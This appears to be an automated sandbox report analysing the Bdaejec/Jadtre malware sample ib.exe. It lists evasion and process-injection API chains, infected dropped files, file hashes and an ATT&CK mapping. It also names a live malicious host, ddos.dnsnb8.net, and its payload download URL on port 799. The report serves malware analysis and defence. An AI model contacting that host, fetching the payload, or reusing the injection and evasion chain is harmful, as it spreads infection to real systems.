Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\ib.exe

Code function: GetForegroundWindow,GetWindowThreadProcessId,CreateThread,CloseHandle,Sleep,?_Xlength_error@std@@YAXPBD@Z,OpenProcess,K32GetProcessImageFileNameA,strstr,K32EnumProcessModulesEx,K32GetModuleFileNameExA,StrStrIA,Sleep,?_Xbad_function_call@std@@YAXXZ,

0_2_003E2510

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\ib.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-1268

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\ib.exe

Stalling execution: Execution stalls by calling Sleep

graph_0-1129

Source: C:\Users\user\Desktop\ib.exe	Window / User API: threadDelayed 1945	Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Window / User API: threadDelayed 3716	Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Window / User API: foregroundWindowGot 1758	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_2-874

Source: C:\Users\user\Desktop\ib.exe TID: 6196

Thread sleep time: -3716000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\ib.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ib.exe

Thread sleep count: Count: 1945 delay: -3

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00CB1754h

2_2_00CB1718

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_00CB29E2

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00CB2B8C

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ib.exe, 00000000.00000002.4134137721.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

API call chain: ExitProcess graph end node

graph_2-847

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_003E31A6

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E9044 mov eax, dword ptr fs:[00000030h]

0_2_003E9044

Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003E3308 SetUnhandledExceptionFilter,	0_2_003E3308
Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003E31A6
Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003E2CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003E2CCC

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E22C0 OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,GetLastError,GetLastError,_printf,WaitForSingleObject,CloseHandle,

0_2_003E22C0

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event,

0_2_003E1670

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event,

0_2_003E1670

Source: SciTE.exe.2.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E3444 cpuid

0_2_003E3444

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E3096 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_003E3096

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_00CB139F

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	21 Input Capture	11 System Time Discovery	1 Taint Shared Content	21 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	12 Process Injection	12 Virtualization/Sandbox Evasion	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
ib.exe	95%	ReversingLabs	Win32.Virus.Jadtre
ib.exe	100%	Avira	W32/Jadtre.B
ib.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\hjErac.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\hjErac.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\hjErac.exe	97%	ReversingLabs	Win32.Trojan.Skeeyah

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net/cH	hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.scintilla.org/scite.rng	SciTE.exe.2.dr	false		unknown
http://www.rftp.comJosiah	SciTE.exe.2.dr	false		unknown
http://www.activestate.com	SciTE.exe.2.dr	false		unknown
http://www.activestate.comHolger	SciTE.exe.2.dr	false		unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	hjErac.exe, 00000002.00000003.1687849172.0000000000830000.00000004.00001000.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.2.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.2.dr	false		unknown
http://www.baanboard.comBrendon	SciTE.exe.2.dr	false		unknown
http://ddos.dnsnb8.net:799/cj//k1.rarGsf	hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.smartsharesystems.com/	SciTE.exe.2.dr	false		unknown
http://www.scintilla.org	SciTE.exe.2.dr	false		unknown
http://www.spaceblue.comMathias	SciTE.exe.2.dr	false		unknown
http://ddos.dnsnb8.net:799/cj//k1.rarGv	hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.2.dr	false		unknown
http://www.develop.com	SciTE.exe.2.dr	false		unknown
http://www.lua.org	SciTE.exe.2.dr	false		unknown
http://ddos.dnsnb8.net/	hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ddos.dnsnb8.net:799/cj//k1.rarR	hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ddos.dnsnb8.net:799/cj//k1.rarq	hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.spaceblue.com	SciTE.exe.2.dr	false		unknown
http://ddos.dnsnb8.net:799/cj//k1.rarp	hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp	false		unknown
http://www.baanboard.com	SciTE.exe.2.dr	false		unknown
http://www.develop.comDeepak	SciTE.exe.2.dr	false		unknown
http://ddos.dnsnb8.net:799/cj//k1.rarg	hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542812
Start date and time:	2024-10-26 13:51:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ib.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@6/11@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 24 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: ib.exe

Simulations

Behavior and APIs

Time	Type	Description
07:52:22	API Interceptor	1x Sleep call for process: WerFault.exe modified
07:52:35	API Interceptor	11499192x Sleep call for process: ib.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	jhvzpcfg.biz/qsmoxnmhx
	samoanaliz-uroka-okruzhayuschij-mir-po-teme-kakie-byvayut-zhivotnye.exe	Get hash	malicious	Unknown	Browse	wxanalytics.ru/net.exe
	balet-spyaschaya-krasavitsa.exe	Get hash	malicious	Unknown	Browse	wxanalytics.ru/net.exe
	http://44.221.84.105	Get hash	malicious	Unknown	Browse	44.221.84.105/favicon.ico
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	neazudmrq.biz/yewbnslbiwmcquj
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	banwyw.biz/wrjeoyp
	nL0Vxav3OB.exe	Get hash	malicious	Remcos	Browse	zrlssa.biz/rybtaabjv
	tyRPPK48Mk.exe	Get hash	malicious	Remcos	Browse	uphca.biz/hiqtpnauanelpf
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	bumxkqgxu.biz/shs
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	1hdqYXYJkr.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(212).exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(216).exe.dll	Get hash	malicious	Bdaejec, Sality	Browse	44.221.84.105
	A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	builder_Release.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	50.17.73.10
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	54.144.81.186
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	44.194.43.138
	http://fleurifleuri.com/	Get hash	malicious	Unknown	Browse	52.73.109.207
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	54.234.67.123
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	3.232.100.182
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	52.72.187.220
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	100.29.92.175
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	3.232.195.24
	http://www.wattpad.com	Get hash	malicious	Unknown	Browse	54.86.240.225

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\hjErac.exe	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse
	8VB4lVuZk3.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse
	#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe	Get hash	malicious	Bdaejec, Sality	Browse
	a4#Uff09.exe	Get hash	malicious	Bdaejec, Sality	Browse
	1.0.0.2.exe	Get hash	malicious	Bdaejec, Sality	Browse
	log1.exe	Get hash	malicious	Babadeda, Bdaejec, Neshta	Browse
	log2.exe	Get hash	malicious	Babadeda, Bdaejec, Neshta	Browse
	2.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\hjErac.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.5911440658238485
Encrypted:	false
SSDEEP:	384:1FZSnXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:spQGPL4vzZq2o9W7GsxBbPr
MD5:	0BB59688EC3CF103657A0DB5E75075A0
SHA1:	1950DFC6118EEE13977464AA342264B0883DD8E9
SHA-256:	4DAB9C9680C0F8F3AD9842314AC752B154DC4D39F25EA4BD428A1C1C9B46E5D6
SHA-512:	0CAA686C7D8D82EAEAC8ADBB93B6BCC19375829649C691F07B5C3B7FF0FEFF5B680BFF983B84ED02A4C1879018CEC388FAB4E3BC60B1874905A5F61C9AD7F7F6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\hjErac.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.731343345661525
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	74C27876C65A47147BA285364470602C
SHA1:	F382E2F940238FA8C42C24AB288B50C317C54B7F
SHA-256:	C7EA5132A5F03A488EA78AB139E2033B06343F562E7BF4E11D7CCCD1D225A031
SHA-512:	42778A98C9AC59886784310D5C9E66761FA68AEA3449D7726B39C18CDC6923BA953247AEF405846056471E672FD333C2B33793889B5E8A6328BCC5DDD06F6DA0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\hjErac.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
